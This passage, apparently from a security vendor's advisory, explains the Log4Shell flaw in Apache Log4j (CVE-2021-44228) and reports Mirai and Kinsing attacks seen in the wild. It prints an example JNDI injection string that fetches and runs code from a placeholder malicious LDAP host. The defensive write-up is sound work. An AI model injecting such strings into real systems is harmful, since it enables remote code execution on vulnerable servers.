Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited

A vulnerability in Apache Log4j, a widely used logging package for Java has been found. The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell. It was first reported privately to Apache on November 24 and was patched with version 2.15.0 of Log4j on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter. 

Whenever ${some_expression} can be found, Java lookup mechanisms find the value of expression and replaces it. Some of the lookups supported by Log4j are jndi, sys, env, java, lower, and upper. JNDI lookup supports protocols such as LDAP, RMI, DNS, and IIOP. As we discuss in the following, an attacker could inject JNDI expressions in logs.

For example, an attacker can do this via HTTP requests to a web server; notably, this is the most common attack vector that we have seen currently. The lookup method will then download and execute malicious.class placed in an attacker-controlled LDAP server. In its most basic form, all the attacker has to do is to plant the following expression in the logs:

${jndi:ldap://{malicious website}/a}

This will then run the malicious Java code located at http://{malicious website}/{malicious.class}.

Attacks in the wild

Currently, we have observed threat actors are dropping Mirai variants and Kinsing coinminers onto vulnerable servers. While some of the network traffic is simple, other threat actors are using obfuscation in the expression to hide their traffic. Examples of these can be found at the end of this entry.

Infection chain

Here is a possible infection flow from attacks that might exploit Log4Shell: